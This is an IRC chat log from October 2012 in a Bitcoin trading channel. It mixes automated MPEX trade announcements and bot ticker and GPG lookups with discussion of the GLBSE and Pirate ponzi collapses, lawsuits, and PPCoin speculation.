[S.MPOE] 23300 @ 0.00044277 = 10.3165 BTC [+] Oct 22 22:30:32 [MPEX] [S.MPOE] 1606 @ 0.00044306 = 0.7116 BTC [+] Oct 22 22:30:34 [MPEX] [S.MPOE] 1800 @ 0.00044336 = 0.798 BTC [+] Oct 22 22:30:34 [MPEX] [S.MPOE] 35619 @ 0.0004438 = 15.8077 BTC [+] Oct 22 22:30:35 [MPEX] [S.MPOE] 55600 @ 0.00044394 = 24.6831 BTC [+] Oct 22 22:30:36 [MPEX] [S.MPOE] 10804 @ 0.00044408 = 4.7978 BTC [+] Oct 22 22:30:37 [MPEX] [S.MPOE] 36300 @ 0.00044435 = 16.1299 BTC [+] Oct 22 22:30:38 [MPEX] [S.MPOE] 46145 @ 0.00044437 = 20.5055 BTC [+] Oct 22 22:30:39 [MPEX] [S.MPOE] 25500 @ 0.00044527 = 11.3544 BTC [+] Oct 22 22:30:40 eeee Oct 22 22:30:40 [MPEX] [S.MPOE] 43000 @ 0.00044539 = 19.1518 BTC [+] Oct 22 22:30:41 [MPEX] [S.MPOE] 4900 @ 0.00044549 = 2.1829 BTC [+] Oct 22 22:30:42 [MPEX] [S.MPOE] 46300 @ 0.0004457 = 20.6359 BTC [+] Oct 22 22:30:43 [MPEX] [S.MPOE] 10026 @ 0.00044695 = 4.4811 BTC [+] Oct 22 22:31:18 whoop whooo Oct 22 22:31:22 )0_o-i Oct 22 22:43:20 munroe is cool Oct 22 22:56:00 [MPEX] [S.MPOE] 17314 @ 0.00043563 = 7.5425 BTC [-] Oct 22 22:56:02 [MPEX] [S.MPOE] 4537 @ 0.00043543 = 1.9755 BTC [-] Oct 22 22:56:02 [MPEX] [S.MPOE] 31349 @ 0.00043537 = 13.6484 BTC [-] Oct 22 23:00:08 mircea_popescu, the dividends are announced in rss, too? Oct 22 23:00:33 or on twatter...i can't find any sample Oct 22 23:09:25 jurov: assbot announces the dividends for mpex listing Oct 22 23:09:39 somehow Oct 22 23:09:42 somewhat. Oct 22 23:09:43 yeah :) Oct 22 23:10:12 somewhere :p Oct 22 23:10:37 and pulls them from where? Oct 22 23:10:43 twitter Oct 22 23:11:48 who programmed assbot? parsing function would be kindly appreciated Oct 22 23:12:19 It was I, LeClerc. Oct 22 23:13:35 give me a sec or so im in the middle of something Oct 22 23:15:04 jurov: I wrote a bot that does the same thing, it's on github at https://github.com/Azelphur/BitcoinAssets Oct 22 23:15:27 :D Oct 22 23:15:31 i want the mint chart api lol Oct 22 23:15:43 glwt Oct 22 23:16:05 thanks! Oct 22 23:16:09 support@mint.com Oct 22 23:16:43 lol, that would be amazing if they were gave you the code to the charts :D Oct 22 23:17:14 does this make sense?: Oct 22 23:17:16 No amendment, change, or modification to this agreement will be effective or enforceable unless the text of it is appended to the end of a copy of this agreement and any previous amendments, changes, or modifications, which is signed by all parties involved, and signed by all parties involved. Oct 22 23:18:48 ...copy of this agreement INCLUDING any previous... Oct 22 23:18:52 feels clearer Oct 22 23:19:00 ah, it does Oct 22 23:19:08 thx jurov :D Oct 22 23:22:03 [MPEX] [S.MPOE] 20851 @ 0.00043537 = 9.0779 BTC [-] Oct 22 23:22:05 [MPEX] [S.MPOE] 5349 @ 0.00043478 = 2.3256 BTC [-] Oct 22 23:23:55 jurov yes Oct 22 23:24:33 Azelphur speaking of that bot, how's dev coming along ? Oct 22 23:24:47 jurov that alzy script wont give you dividends afaik, see pm Oct 22 23:24:59 yea, mine doesn't parse dividends Oct 22 23:25:12 mircea_popescu: still need to get working on it Oct 22 23:25:21 smickles that sounded painful. Oct 22 23:25:56 but as a matter of principle, i don't think it's a good idea to allow such a thing. you will conceivably end up with 2mb of signatureporn Oct 22 23:29:54 mostly done it using RSS instead and that's a bit different... so i'm on my own anyway Oct 22 23:33:51 im not sure there is a rss feed of dividends >< Oct 22 23:33:54 is there ? Oct 22 23:37:37 http://www.youtube.com/watch?v=Bto7vH-rz-E Oct 22 23:37:47 recursive gpg --verify ftw Oct 22 23:37:48 ! Oct 22 23:39:48 o, this is new https://bitcointalk.org/index.php?topic=119745.0 Oct 22 23:39:59 talk to me in 5 years, when we're back rubbing sticks together cause you fucked up civilisation. Oct 22 23:40:30 kakobrekla bitcoinica umm... 5.0 ? Oct 22 23:41:23 it accualy uses their codebase rofl Oct 22 23:41:35 Nice, but you could have at least plugged the most obvious security holes of the Bitcoinica source code before re-using it. Oct 22 23:41:42 ahahaha wunderbar. Oct 22 23:41:52 haha Oct 22 23:41:58 Thanks Davout, Oct 22 23:41:58 I handed over to the developper and meanwhile added a routine to check and correct users leverage. Oct 22 23:42:06 zee develloper Oct 22 23:42:08 Bitfinex, How does it works? Oct 22 23:42:17 it works like majigz Oct 22 23:43:18 anyway, this double p thing is quite fetching. i think i will double all my p's from now on given that english uses entirely too few p's in the first pplace Oct 22 23:43:27 and never fucken doubles them Oct 22 23:44:02 you are pprolly onto something Oct 22 23:45:02 "I'm having mixed feeling towards this project. The security measures you have implemented seem really great, and inspire great confidence in your service. Using the source of a service that had some major issues, not so much." Oct 22 23:45:11 if that forum ever goes away i shall miss it Oct 22 23:46:18 Hi Mushoz, I understand this concern, there was a general lack of security features, that we tried to correct to the best, and that's why we're in beta. Hey, we already had a bug with Davout, because no check of the leverage! Oct 22 23:46:34 pput a sock in it Oct 22 23:46:38 ;D Oct 22 23:46:58 this vaguely reminds me of the hapy-go-lucky attitude of that bitdaytrader dood, who was explaining how his best friend made over 21mn btc (by exploiting one of the umpteen bbilion holes in his "code") Oct 22 23:47:34 [MPEX] [S.MPOE] 1220 @ 0.00043478 = 0.5304 BTC [-] Oct 22 23:47:49 First, we invested so reserve funds adnd are ready (able) to take up to 400 btc and 4000 usd loss if shit should happen during the beta. Oct 22 23:48:02 sounds almost like a bounty :) Oct 22 23:48:13 ;;ticker Oct 22 23:48:14 BTCUSD ticker | Best bid: 11.70000, Best ask: 11.70001, Bid-ask spread: 0.00001, Last trade: 11.70000, 24 hour volume: 34341.96626791, 24 hour low: 11.47110, 24 hour high: 11.81000, 24 hour vwap: 11.69566 Oct 22 23:48:24 whew. for a moment there i thought we're at 10 now. Oct 22 23:48:38 WAIT! Oct 22 23:48:50 omg nanotube stole my ticker format! Oct 22 23:49:01 THIS IS INFRINGATORY THEFT Oct 22 23:49:04 ;;bc,convert eur Oct 22 23:49:05 1 BTC = 11.70000 U.S. dollars = 8.96895362 Euros Oct 22 23:49:58 LOL! "International Karmic Bitcoin Bank of Ponyville" Oct 22 23:50:07 10% weekly :) Oct 22 23:50:31 come to think about it... developopper sounds better than developper. Oct 22 23:51:09 "Finally to answer your specific example: a user balance won't be able to be withdrawn to negative because we would have checked it (and the balances work without bugs)." Oct 22 23:51:30 hmm Oct 22 23:51:44 this is too good. i wish for myself this proscriptive ability where you draw the limits of what may to fail aforehand. Oct 22 23:51:53 sure takes all the scary out of risk management. Oct 22 23:51:56 im confused why no trolls are screaming 'scam' Oct 22 23:52:11 cause it doesn't seem at all legitimate ? Oct 22 23:52:33 Quote from: davout on Today at 01:28:33 PM Oct 22 23:52:33 What about the infamous race conditions ? Oct 22 23:52:33 According to my guy he used a hook called "after_commit" where needed, but I'm currently reviewing the code. Meanwhile if you can execute it that means he didn't do enough! Oct 22 23:52:39 hey! Oct 22 23:53:15 hm if he is reviewing, why didnt he just code it himself Oct 22 23:53:33 doesn't it sound a lot more important this way ? Oct 22 23:54:01 we can all feel warm and fuzzy now :) Oct 22 23:54:31 the english is too good for alberto Oct 22 23:54:39 dub he's the lover. Oct 22 23:58:48 the fuck is this gox bot doing Oct 22 23:59:27 hm? Oct 23 00:01:12 something killing the spread Oct 23 00:02:18 fuck it **** BEGIN LOGGING AT Tue Oct 23 07:06:29 2012 Oct 23 07:08:49 synchronizing with network, 42 blocks remaining Oct 23 07:08:53 sounds spiffy :D Oct 23 07:31:03 [MPEX] [S.MPOE] 1200 @ 0.00043329 = 0.5199 BTC [-] Oct 23 07:45:20 [MPEX] [S.DICE] 5000 @ 0.0033 = 16.5 BTC [-] Oct 23 07:46:25 [MPEX] [O.BTCUSD.C190T] 6 @ 0.02836065 = 0.1702 BTC [-] Oct 23 07:48:14 ;;calc ([ticker --bid] - 19) / [ticker --bid] Oct 23 07:48:15 -0.611835965999 Oct 23 07:52:51 [MPEX] [O.BTCUSD.C160T] 2 @ 0.03042958 = 0.0609 BTC [-] Oct 23 07:53:03 ;;calc ([ticker --bid] - 16) / [ticker --bid] Oct 23 07:53:04 -0.357335550315 Oct 23 07:53:35 o hey nice formula Oct 23 07:54:07 heh, I had a little help developing it Oct 23 07:54:08 how the fuck does it work o.o Oct 23 07:54:38 o nano has done some serious work on ticker huh ? sweet. Oct 23 07:54:43 how does it work? isn't it essentially the formula we discussed (idunno) a week ago? Oct 23 07:54:49 oh Oct 23 07:54:56 that's how ticker has always been Oct 23 07:55:01 ;;ticker --ask Oct 23 07:55:02 11.78896 Oct 23 07:55:04 ;;ticker --last Oct 23 07:55:05 11.76999 Oct 23 07:55:30 that's it, iirc Oct 23 07:55:53 uh. i dunno, iirc ticker was just Oct 23 07:56:31 Aug 14 01:19:04 ;;ticker Oct 23 07:56:31 Aug 14 01:19:04 Best bid: 11.8901, Best ask: 11.938, Bid-ask spread: 0.04790, Last trade: 11.8901, 24 hour volume: 52892, 24 hour low: 11.45, 24 hour high: 12 Oct 23 07:58:02 mircea_popescu: oh Oct 23 07:58:03 https://github.com/nanotube/supybot-bitcoin-marketmonitor/blob/master/Market/plugin.py#L260 Oct 23 07:59:04 i don't think the ticker code has been modified in a while Oct 23 07:59:24 nice. Oct 23 07:59:47 ;;ticker --high Oct 23 07:59:48 11.86350 Oct 23 07:59:50 ;;ticker --low Oct 23 07:59:50 11.47110 Oct 23 07:59:53 ;;ticker --avg Oct 23 07:59:54 11.70988 Oct 23 08:00:06 ;;ticker --currency jpy Oct 23 08:00:07 BTCJPY ticker | Best bid: 947.617, Best ask: 964.614, Bid-ask spread: 16.99700, Last trade: 964.532, 24 hour volume: 333.75134016, 24 hour low: 935.400, 24 hour high: 964.533, 24 hour vwap: 955.074 Oct 23 08:00:28 ;;ticker --currency nhz Oct 23 08:00:28 Error: Failure to retrieve ticker. Try again later. Oct 23 08:00:31 lol Oct 23 08:01:19 heh, Oct 23 08:01:25 ;;ticker --currency btc Oct 23 08:01:26 Error: Failure to retrieve ticker. Try again later. Oct 23 08:01:37 that could have some humor coded into it Oct 23 08:03:31 ;;ticker --bid --avg Oct 23 08:03:32 Error: Please only choose at most one result option at a time. Oct 23 08:05:46 ;;tell smickles [ticker --bid] and [ticker --avg] Oct 23 08:06:43 kuzetsa: yeah, yeah Oct 23 08:06:46 hehe Oct 23 08:06:54 <3 hi Oct 23 08:07:00 howdy :) Oct 23 08:08:23 I'm learning how to configure DKIM on postfix Oct 23 08:08:35 not going well, and it's making me sad :( Oct 23 08:10:37 i don't think i could help Oct 23 08:18:33 [MPEX] [S.MPOE] 9948 @ 0.00043773 = 4.3545 BTC [+] Oct 23 08:18:34 [MPEX] [S.MPOE] 10052 @ 0.00043863 = 4.4091 BTC [+] Oct 23 08:45:02 [MPEX] [S.MPOE] 1048 @ 0.00043647 = 0.4574 BTC [-] Oct 23 08:45:03 [MPEX] [S.MPOE] 21648 @ 0.00043863 = 9.4955 BTC [+] Oct 23 08:45:05 [MPEX] [S.MPOE] 6404 @ 0.00043867 = 2.8092 BTC [+] Oct 23 08:58:20 !help Oct 23 08:58:20 List of commands: Oct 23 08:58:21 !ticker (desc: returns current MPEX ticker values) Oct 23 08:59:03 !help Oct 23 08:59:04 List of commands: Oct 23 08:59:05 !ticker (desc: returns current MPEX ticker values) Oct 23 09:12:02 [MPEX] [S.MPOE] 3200 @ 0.00043631 = 1.3962 BTC [-] Oct 23 09:37:29 [MPEX] [S.MPOE] 37300 @ 0.00043631 = 16.2744 BTC [-] Oct 23 09:37:30 [MPEX] [S.MPOE] 1700 @ 0.00043529 = 0.74 BTC [-] Oct 23 10:03:06 [MPEX] [S.MPOE] 33600 @ 0.00043624 = 14.6577 BTC [+] Oct 23 10:16:15 when nefario was still happy https://bitcointalk.org/index.php?topic=77301.msg859378#msg859378 I guess this never happened or we will not be in this GLBSE shit storm we are now Oct 23 10:23:30 yeah Oct 23 10:23:37 i tried to get him to do that over 6 months ago Oct 23 10:23:46 he did not want to do it cuz he thought he would lose market share Oct 23 10:29:02 [MPEX] [S.MPOE] 2400 @ 0.00043529 = 1.0447 BTC [-] Oct 23 10:37:24 how many S.dice did gsdpt have? Oct 23 10:37:45 Chaaang-Noi: you asked for that too? Oct 23 10:38:10 i got the same response :| Oct 23 10:54:54 [MPEX] [S.MPOE] 8500 @ 0.00043624 = 3.708 BTC [+] Oct 23 11:20:00 [MPEX] [S.MPOE] 35116 @ 0.00043642 = 15.3253 BTC [+] **** BEGIN LOGGING AT Tue Oct 23 15:42:12 2012 Oct 23 15:58:47 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.14500172 = 145.0017 BTC [-] Oct 23 16:00:57 lol bored gribbIe ? Oct 23 16:01:14 Hello mircea_popescu_bot Oct 23 16:01:46 [MPEX] [O.BTCUSD.P190T] 921 @ 0.62719675 = 577.6482 BTC [-] Oct 23 16:02:06 Diablo-D3 Oct 23 16:02:09 Anduck: Oct 23 16:02:11 [MPEX] [O.BTCUSD.P130T] 726 @ 0.11239778 = 81.6008 BTC [-] Oct 23 16:02:16 are you Diablo-D3 ? Oct 23 16:02:22 maybe Oct 23 16:02:24 no Oct 23 16:02:32 you're mr. coingenuity Oct 23 16:02:35 but Oct 23 16:02:39 could you tell ? Oct 23 16:02:53 hehehe Oct 23 16:02:57 Diablo-D3: whats happening to DMC and how about the BFL.FAIL / BFL.SUCC ? Oct 23 16:03:15 i havent heard any news considering dmc lately Oct 23 16:03:26 you are aware glbse imploded right ? Oct 23 16:03:48 yes. Oct 23 16:04:07 exploded* Oct 23 16:04:22 not really, cause an explosion technically consists of expelling matter outwards. no matter. Oct 23 16:04:41 but that's a technical point. what'd you expect be happening to glbse assets ? noffin much. Oct 23 16:05:18 well Oct 23 16:05:25 people gathered money via glbse Oct 23 16:05:32 then glbse _IMPLODES_ Oct 23 16:05:43 suspicious, isn't it. Oct 23 16:05:48 and everything gone? Oct 23 16:05:56 people who gathered money just disappear with their moniee Oct 23 16:06:02 investors think wtf just happened Oct 23 16:06:05 OR wat? Oct 23 16:06:11 best i can tell. Oct 23 16:06:26 why won't nefario atleast give a list of assests and share ownerships Oct 23 16:06:31 ikr? Oct 23 16:06:35 right, gigavps? Oct 23 16:06:40 btw gigavps any news about pirate? Oct 23 16:06:51 lol Anduck is in reruns mode :D Oct 23 16:07:04 Anduck nefario is probably holding the asset lists hostage to get the double payments back Oct 23 16:07:20 double payments? Oct 23 16:07:23 what are those? Oct 23 16:07:27 gigavps course before he was holding them hostage to get w/e, theymos' 800 Oct 23 16:07:38 Anduck he "accidentally" made some double payments of btc cash Oct 23 16:07:43 ^^ Oct 23 16:07:44 held in glbbq accts Oct 23 16:07:45 ok...lol Oct 23 16:08:01 so he actually did pay out btc that was held in glbse accs? Oct 23 16:08:03 Anduck as for pirate, your guess is as good as mine Oct 23 16:08:11 i guess in the mid term he'll be holding them hostage to end the middle east crisis. Oct 23 16:08:12 ok Oct 23 16:08:23 nothing happened at 12th day or since that? Oct 23 16:08:37 lol ok mircea_popescu Oct 23 16:08:46 shady Oct 23 16:08:49 very shady thing indeed. Oct 23 16:11:14 Anduck i received the coins back that were in my glbse account Oct 23 16:11:34 and it was rounded up to the tenth of a coin for some reason Oct 23 16:13:09 ok. Oct 23 16:13:35 i did call nefario three times to make sure he knew how important it was that he returned the coins Oct 23 16:13:50 so that may of had something to do with it Oct 23 16:19:33 hello :) Oct 23 16:20:20 DeaDTerra!*@* added to ignore list. Oct 23 16:22:22 okay Oct 23 16:22:25 DeaDTerra still need a loan Oct 23 16:22:27 ? Oct 23 16:23:25 you got your loan? Oct 23 16:25:12 DeaDTerra you think the price is headed down? Oct 23 16:27:17 [MPEX] [S.MPOE] 4144 @ 0.0004363 = 1.808 BTC [+] Oct 23 16:28:20 " general positivity of the community" :) Oct 23 16:28:31 we got aids ? Oct 23 16:28:47 zero positive Oct 23 16:41:45 there is always ppcoin... Oct 23 16:45:56 i was just kidding Oct 23 16:48:03 mircea_popescu waddup Oct 23 16:52:40 [MPEX] [S.MPOE] 1700 @ 0.00043751 = 0.7438 BTC [+] Oct 23 16:52:42 [MPEX] [S.MPOE] 44400 @ 0.00043754 = 19.4268 BTC [+] Oct 23 16:57:45 DeaDTerra: only BTC advantage at the moment it's its price and collective hope, that it will go even higher and we get out of it, before it falls flat on it's face. Sorry, but that is all the advantage it got. Oct 23 16:57:53 Same applies to LTC, and PPC Oct 23 16:58:12 close to 0 usable services in all of them :( Oct 23 16:58:48 no way Oct 23 16:59:15 1 easier internet access to the black market, i.e. internet cash Oct 23 16:59:27 OK; there is this cool coffee seller and someone was offering overpriced VPS? Oct 23 16:59:31 2 p2p based services that don't require third party Oct 23 16:59:43 I bought a rasberry pi Oct 23 16:59:45 last night Oct 23 16:59:49 shits are hard to find Oct 23 16:59:54 thestringpuller: those are not services - this is infrastructure Oct 23 17:00:13 there are roads but no cars or places to go :) Oct 23 17:00:14 2 p2p based sales* Oct 23 17:00:16 :P Oct 23 17:00:23 senor semantics Oct 23 17:00:49 yes it is a bit early for bitcoins, maybe it would be more suited for when we have space travel Oct 23 17:01:04 you mean never? Oct 23 17:01:10 pessimist are we? Oct 23 17:01:14 not at all Oct 23 17:01:21 How bout dat mug btw? Oct 23 17:01:46 you nor me will see space travel Oct 23 17:02:12 thestringpuller: mug is cool, I know Oct 23 17:02:15 I plan to get rich or die trying, in order to by a space ship Oct 23 17:02:20 buy* Oct 23 17:02:55 also today I'm talking with a coffee vendor on campus to put up a "bitcoin accepted here" sign to take metrics on bitcoin users in a technologically dense society Oct 23 17:03:03 (goes to an engineering school) Oct 23 17:03:11 But I am starting to think about real crowd financing because BTC people are used to 7% per week and everything else is out ;) Oct 23 17:03:34 7% a week is a scam Oct 23 17:03:40 and I can not pay 7% per week Oct 23 17:03:50 unless you provide someone health insurance Oct 23 17:03:52 not even per month probably unless we have a really good run Oct 23 17:04:09 ;;calc 7*56 Oct 23 17:04:09 392 Oct 23 17:04:15 that's ureasonable Oct 23 17:04:45 no investment vehicle makes that money Oct 23 17:04:48 straight up gambling Oct 23 17:05:04 I know but they do not ;) Oct 23 17:05:53 Now they should know, since everyone is defaulting left and right. Oct 23 17:06:26 but what exchange can I use? Oct 23 17:07:08 OT? Oct 23 17:07:47 someone would have to build an exchange off of OT Oct 23 17:07:58 then get passthrus... Oct 23 17:08:09 OT isn't "there" yet Oct 23 17:08:27 indeed Oct 23 17:09:27 OT can be used but it's too complicated and confusing at the moment Oct 23 17:10:12 and first you have to buy btc derivatives to buy securities etc Oct 23 17:12:07 exactly EskimoBob Oct 23 17:13:51 WOW! PPC is going up like mad monkey Oct 23 17:16:03 why? Oct 23 17:18:03 [MPEX] [S.MPOE] 22600 @ 0.0004372 = 9.8807 BTC [-] Oct 23 17:21:43 same reason why BTC etc :) Oct 23 17:22:25 also, bitcoin 'has a large community' is a negative aspect Oct 23 17:23:30 because its a very retarded community Oct 23 17:23:42 that scares most normal people away from bitcoin Oct 23 17:27:39 brrr.. way too much Oct 23 17:29:06 whats ppc price? Oct 23 17:30:01 last trade 0.000299 Oct 23 17:30:07 snobbery Oct 23 17:30:46 I have about 11btc worth! Oct 23 17:30:54 http://www.proofofstake.com/ Oct 23 17:31:40 the pay per share dropped to 0.067 in http://ppcpool.bitparking.com/pool Oct 23 17:31:43 why? Oct 23 17:31:53 it was like 0.089 Oct 23 17:32:07 difficulty increased? Oct 23 17:32:39 ;;calc 50/13380.25645819 Oct 23 17:32:40 0.00373684915205 Oct 23 17:33:22 looks like he's over paying Oct 23 17:35:09 I had few BTC in it too and even mined some for fun Oct 23 17:35:33 explain PPC to me plz. kthx. Oct 23 17:38:03 B0g4r7: you put X BTC in and take 2xX BTC out. Something like that Oct 23 17:40:04 I'm reading the "paper" and it's not making much sense. Oct 23 17:41:13 ppc is pretty crazy Oct 23 17:41:32 but i hold some like 200k cuz i expect pump and dump Oct 23 17:41:44 its more than doubled so far :/ Oct 23 17:42:40 copumpkin today i was some soup, it was called "cream of pumpkin" and i thought of you:) Oct 23 17:42:54 fuck i was not soup, i saw soup! Oct 23 17:43:06 :O Oct 23 17:43:07 [MPEX] [S.MPOE] 6700 @ 0.00043754 = 2.9315 BTC [+] Oct 23 17:43:08 [MPEX] [S.MPOE] 23227 @ 0.00043775 = 10.1676 BTC [+] Oct 23 17:43:09 [MPEX] [S.MPOE] 22973 @ 0.00043834 = 10.07 BTC [+] Oct 23 17:43:09 that sounds rude Oct 23 17:43:16 was got turned backwards some how saw/was/saw/was :) Oct 23 17:43:25 Chaaang-Noi: hi soup Oct 23 17:43:34 Chaaang-Noi: any news about pirate? Oct 23 17:43:35 im not soup anyway anyway :) Oct 23 17:43:54 the people who were going to go after pirate but back out cuz of the oct 12 thing Oct 23 17:44:00 they are now talking about doing something Oct 23 17:44:05 not everyone is retarded dub Oct 23 17:44:06 ok Oct 23 17:44:08 i wished them good luck Oct 23 17:44:14 are you gonna do so smth? Oct 23 17:44:24 werent you the one who _was_ really going to do things? Oct 23 17:44:33 did anything happen at oct 12? Oct 23 17:44:35 i did Oct 23 17:44:39 i went alone Oct 23 17:44:44 i did waht i could from thialnd Oct 23 17:44:51 i had a lawyer try and do collections Oct 23 17:44:52 Chaaang-Noi: what people are going after him? Oct 23 17:45:15 the people posted on the forum, then got rid of their posts... cuz feared pirate Oct 23 17:45:15 what was the outcome, Chaaang-Noi? Oct 23 17:45:22 so im not going to re out them Oct 23 17:45:33 the lawyer is going to get 10% and well 40,000 btc... Oct 23 17:45:36 so he is working Oct 23 17:45:54 he has made contact with pirate Oct 23 17:46:02 he is trying to lock down property Oct 23 17:46:09 sadly though cuz no crime we cant do more Oct 23 17:46:20 ok Oct 23 17:46:24 Chaaang-Noi: do you know if they are doing class action, or just for themselves? Oct 23 17:46:26 and i cant say there is a crime unless i get a differnt type of lawyer and go to usa and all the bs Oct 23 17:46:32 the other left me out to dry Oct 23 17:46:43 they wanted me back in like 2 days ago Oct 23 17:46:49 i said good luck and left it at that Oct 23 17:47:06 the guy said he would not quit on me no matter what Oct 23 17:47:21 the pirates clear delay wait til 12th he quit... Oct 23 17:47:23 so lol who knows Oct 23 17:47:26 and now SEC Oct 23 17:47:36 if the SEC gets pirate them my lawyer can do more Oct 23 17:47:47 but if SEC gets him clearly i cant get funds cuz SEC will Oct 23 17:47:49 so... Oct 23 17:47:52 im pretty fucked i think Oct 23 17:48:18 shame that the people suing pirate arn't putting out more info Oct 23 17:48:21 I'd be interested in that Oct 23 17:48:27 I'm sure you know the relevant lesson here. Oct 23 17:48:37 "too good to be true" and all that. Oct 23 17:49:41 i dont think they are just yet Oct 23 17:49:48 they want to try and reform the group to sue Oct 23 17:50:02 but now SEC is there and i already have a guy for collections i dont know what i can gain Oct 23 17:50:18 i was mostly doing it for the share holder Oct 23 17:50:37 but as nefario killed that anyway i am not obligated to help them:/ Oct 23 17:51:04 You ran a PPT? Oct 23 17:51:16 pirate owes me more than 1k btc, so I'm interested in pursuing although I don't hold much hope. Oct 23 17:52:10 Ah, i see, TRGYY.P. Oct 23 17:52:17 Well, correct spelling, but yes. Oct 23 17:52:37 :) Oct 23 17:52:55 i kinda assumed that if i got back 90% the shareholders would be okay with that... Oct 23 17:53:04 but nefario voided that so meh Oct 23 17:53:14 i dont think i will get anything anyway, now esp SEC Oct 23 17:58:18 Chaaang-Noi: any way to find out more info on the suing pirate stuff? Oct 23 17:59:28 you could ask them Oct 23 17:59:39 Chaaang-Noi: how do I ask them if I don't know who they are? XD Oct 23 18:00:06 you can find out who was going to head up the big lawsuit last time, im sure someone will know who it was Oct 23 18:09:21 [MPEX] [S.MPOE] 23336 @ 0.00043834 = 10.2291 BTC [+] Oct 23 18:09:23 [MPEX] [S.MPOE] 1464 @ 0.00043839 = 0.6418 BTC [+] Oct 23 18:24:47 ;;tslb Oct 23 18:24:58 Time since last block: 4 minutes and 38 seconds Oct 23 18:31:00 ;;tslb Oct 23 18:31:03 Time since last block: 3 minutes and 50 seconds Oct 23 18:34:34 [MPEX] [S.MPOE] 2300 @ 0.00043839 = 1.0083 BTC [+] Oct 23 18:59:41 [MPEX] [S.MPOE] 16056 @ 0.0004372 = 7.0197 BTC [-] Oct 23 18:59:42 [MPEX] [S.MPOE] 35944 @ 0.00043448 = 15.6169 BTC [-] Oct 23 19:13:20 ;;tslb Oct 23 19:13:23 Time since last block: 18 minutes and 18 seconds Oct 23 19:26:50 [MPEX] [S.MPOE] 11264 @ 0.00043738 = 4.9266 BTC [+] Oct 23 19:27:57 ;;tslb Oct 23 19:28:05 Time since last block: 32 minutes and 59 seconds Oct 23 19:28:11 i heart ltc Oct 23 19:51:56 ;;tslb Oct 23 19:51:58 Time since last block: 56 minutes and 53 seconds Oct 23 19:52:05 i heart ltc Oct 23 19:52:48 [MPEX] [S.MPOE] 16484 @ 0.00043633 = 7.1925 BTC [-] Oct 23 20:00:50 ;;tslb Oct 23 20:00:56 Time since last block: 2 minutes and 1 second Oct 23 20:01:02 w000 Oct 23 20:19:23 [MPEX] [S.MPOE] 27900 @ 0.00043667 = 12.1831 BTC [+] Oct 23 20:19:24 [MPEX] [S.MPOE] 7000 @ 0.00043735 = 3.0615 BTC [+] Oct 23 20:44:51 [MPEX] [S.MPOE] 20816 @ 0.00043633 = 9.0826 BTC [-] Oct 23 20:44:53 [MPEX] [S.MPOE] 5056 @ 0.00043448 = 2.1967 BTC [-] Oct 23 20:44:54 [MPEX] [S.MPOE] 2428 @ 0.00043429 = 1.0545 BTC [-] Oct 23 21:10:07 [MPEX] [S.MPOE] 20100 @ 0.00043525 = 8.7485 BTC [+] Oct 23 21:10:09 [MPEX] [S.MPOE] 9300 @ 0.00043429 = 4.0389 BTC [-] Oct 23 21:25:42 ;;gpg doff Oct 23 21:25:42 Error: The "GPG" plugin is loaded, but there is no command named "doff" in it. Try "list GPG" to see the commands in the "GPG" plugin. Oct 23 21:25:53 ;gpg info doffx Oct 23 21:28:07 that didint work Oct 23 21:28:16 ;ident doffx Oct 23 21:28:37 Bleh I really dont use the bot enough to remember any commands Oct 23 21:28:42 ;;ident doffx Oct 23 21:28:43 Nick 'doffx', with hostmask 'Doffx!~doff@173-160-245-174-Washington.hfc.comcastbusiness.net', is not identified. Oct 23 21:28:54 ;;gpg info doffx Oct 23 21:28:54 User 'Doffx', with keyid DE23494FA64F5DA1, fingerprint 9A9A9D9CA29C8F1FB40AC46DDE23494FA64F5DA1, and bitcoin address 1Q9FavHENPK7sATGm8ebthxG9EhQmaamw2, registered on Sat Apr 21 13:05:42 2012. http://bitcoin-otc.com/viewgpg.php?nick=Doffx . Currently not authenticated. Oct 23 21:28:59 There we go. Oct 23 21:31:25 Azelphur https://bitcointalk.org/index.php?topic=119590.40 Oct 23 21:35:19 [MPEX] [S.MPOE] 29712 @ 0.00043429 = 12.9036 BTC [-] Oct 23 21:36:20 Chaaang-Noi: ty Oct 23 21:36:30 :) Oct 23 21:36:42 btw i have everything he had and more... Oct 23 21:37:27 fun Oct 23 21:40:49 ;;gpg info doffx Oct 23 21:40:50 User 'Doffx', with keyid DE23494FA64F5DA1, fingerprint 9A9A9D9CA29C8F1FB40AC46DDE23494FA64F5DA1, and bitcoin address 1Q9FavHENPK7sATGm8ebthxG9EhQmaamw2, registered on Sat Apr 21 13:05:42 2012. http://bitcoin-otc.com/viewgpg.php?nick=Doffx . Currently authenticated from hostmask Doffx!~doff@173-160-245-174-Washington.hfc.comcastbusiness.net . Oct 23 21:40:57 ;;ident doffx Oct 23 21:40:58 Nick 'doffx', with hostmask 'Doffx!~doff@173-160-245-174-Washington.hfc.comcastbusiness.net', is identified as user Doffx, with GPG key id DE23494FA64F5DA1, key fingerprint 9A9A9D9CA29C8F1FB40AC46DDE23494FA64F5DA1, and bitcoin address 1Q9FavHENPK7sATGm8ebthxG9EhQmaamw2 Oct 23 21:41:04 There Oct 23 21:41:08 Sorry for the spam Oct 23 21:42:42 2 Oct 23 22:02:18 [MPEX] [S.MPOE] 14146 @ 0.00043455 = 6.1471 BTC [+] Oct 23 22:28:19 [MPEX] [S.MPOE] 4722 @ 0.00043455 = 2.0519 BTC [+] Oct 23 22:53:41 [MPEX] [S.MPOE] 15432 @ 0.00043455 = 6.706 BTC [+] Oct 23 23:05:24 [MPEX] [O.BTCUSD.P110T] 6 @ 0.01568151 = 0.0941 BTC [-] Oct 23 23:07:43 [MPEX] [O.BTCUSD.C130T] 5 @ 0.00772331 = 0.0386 BTC [-] Oct 23 23:09:15 [MPEX] [O.BTCUSD.P100T] 2 @ 0.0032142 = 0.0064 BTC [-] Oct 23 23:13:27 i should have done something like bitcoinpyramid.com Oct 23 23:13:39 instead Oct 23 23:16:53 why? jurov Oct 23 23:17:43 jurov if your idea is any good you will have to shove it down the peoples throats Oct 23 23:17:49 seems much easier to get users to such project Oct 23 23:18:21 how many users you have jurov? Oct 23 23:19:46 <20 and no new reg in past 3 days Oct 23 23:20:11 maybe its lack of options in mpex? Oct 23 23:20:11 needs moar 7%/week Oct 23 23:21:00 need more options. mpex has puts and calls Oct 23 23:21:36 coinbr should let us go into those options Oct 23 23:22:05 why do you think so? options are available maybe a month already Oct 23 23:22:16 just mkopt/split is not there Oct 23 23:22:32 in coinbr allows call/put? Oct 23 23:22:45 yes, you can buy/sell/exercise opts Oct 23 23:23:00 pigeons :D so true Oct 23 23:23:33 sell drugs Oct 23 23:23:38 if you want 7% Oct 23 23:24:45 bitcoinpyramid.com 